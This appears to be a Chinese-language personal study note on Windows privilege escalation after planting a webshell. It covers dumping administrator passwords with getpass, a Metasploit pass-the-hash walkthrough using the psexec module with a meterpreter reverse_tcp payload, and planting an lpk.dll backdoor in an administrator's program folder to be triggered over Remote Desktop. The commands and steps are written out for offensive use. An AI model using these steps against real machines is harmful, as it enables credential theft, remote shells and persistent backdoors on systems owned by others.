今天又學了幾個提權的方法。
1.getpass提權,去網上下載getpass工具,拿到網站的webshell後把這個工具上傳上去,然後調用cmd來執行這個程序,管理員的賬號和密碼就會顯示出來,很強大的一款工具,但是主機如果是安裝的盜版系統,這個工具有時候就會失效。
2.hash傳遞***,這個***就需要用到有名的工具metasploit了,這個工具有windows和linux兩個版本,可以去官網上下載。步驟如下:
啓動msf msfconsole
use exploit/windows/smb/psexec 用到hash傳遞***的模塊
show options 查看選項配置信息
3.set PAYLOAD windows/meterpreter/reverse_tcp 設置載荷
4.set LHOST 本機地址
5.set RHOST 目標地址
6.set SMBUser adminstriator
7.set SMBPass 目標機hash值
8exploit
這裏還需要用到一個獲取目標及管理員hash值得工具,去網上下載,上傳到目標主機中,用cmd運行就可以得到hash值,這樣就ok了。
3.
相當於釣魚,需要管理員配合。
條件:3389遠程桌面開啓 觸發lpk後門
觸發條件:當前目錄存在lpk.dll及exe程序,exe程序被運行,即觸發後門
通過工具生成lpk.dll再通過webshell上傳到管理員常用的exe程序目錄下,等待管理員觸發執行。
工具 tools lpk sethc 用這個工具需要先通過webshell上傳一個開3389的程序,生成的文件名字必須叫lpk不能叫別的。
觸發後在通過遠程桌面鏈接就可以了(這個方法我看了小迪的兩套視頻,他都沒有試成功,我也試了幾次也沒有成功,真不知道是怎麼回事。)